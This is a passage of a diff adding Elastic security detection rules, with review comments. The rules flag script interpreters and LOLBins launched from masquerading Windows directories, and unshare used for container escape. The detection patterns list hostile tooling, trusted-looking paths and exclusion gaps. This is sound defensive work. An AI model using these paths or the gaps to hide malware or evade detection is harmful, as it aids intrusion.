user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n 
\"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : 
\"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + 
"Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json new file mode 100644 index 00000000000..615fd6367ab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json 
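Review bot: The `process.args` path list in the query of cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json contains `C:\Windows\security\*` twice (once after the `AppReadiness` entry, once after the `TextInput` entry); the duplicate does not change matching but should be dropped so the list stays reviewable. The investigation-guide step `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.` appears carried over from a registry-focused rule, since this rule keys on process start events; suggest ending it with `after the suspicious process execution.` instead. Both points apply unchanged to cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json, which differs only in the index pattern, and the same guide wording appears in cde1bafa-9f01-4f43-a872-605b678968b0_111.json.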
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from Unusual Directory - Command Line", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n 
\"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : 
\"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + 
"Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json new file mode 100644 index 00000000000..354faddcc25 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json 
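Review bot: The `process.args` list in the _112 query carries `C:\\Windows\\security\\*` twice (once after `C:\\Windows\\ServiceState\\*`, again after `C:\\Windows\\TextInput\\*`); the second entry is dead weight and should be dropped from the upstream rule so the list stays readable when new paths are added. The triage `note` also keeps a sentence from a registry rule: "searching for login events (for example, 4624) to the target host after the registry modification" — for this execution rule it should read `... to the target host after the suspicious execution`. If these JSON snapshots are produced from the detection-rules source, both fixes belong there rather than in this package copy.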
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Namespace Manipulation Using Unshare", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.executable: \"/usr/bin/unshare\" and\nnot process.parent.executable: (\"/usr/bin/udevadm\", \"*/lib/systemd/systemd-udevd\", \"/usr/bin/unshare\") and\nnot process.args == \"/usr/bin/snap\" and not process.parent.name in (\"zz-proxmox-boot\", \"java\")\n", + "references": [ + "https://man7.org/linux/man-pages/man1/unshare.1.html", + "https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d00f33e7-b57d-4023-9952-2db91b1767c4", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- 
Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "d00f33e7-b57d-4023-9952-2db91b1767c4_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json new file mode 100644 index 00000000000..8e482f64181 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json 
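Review bot: The exclusion `not process.parent.name in ("zz-proxmox-boot", "java")` in the unshare rule blanks out every JVM-hosted parent, which is a wide gap for a rule whose stated purpose is catching container escapes; if the noise comes from a specific workload, narrowing it to a `process.parent.executable` path (as the udevd exclusions already do) keeps the coverage for the rest. The ATT&CK mapping lists only T1543 under Privilege Escalation, while the description and the CrowdStrike reference are about escaping container boundaries, so adding T1611 (Escape to Host) under the same tactic block would make the tagging match the intent. The accepted parent exclusions would also be worth a line in a `### False positive analysis` section of `note`, which this rule currently lacks.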
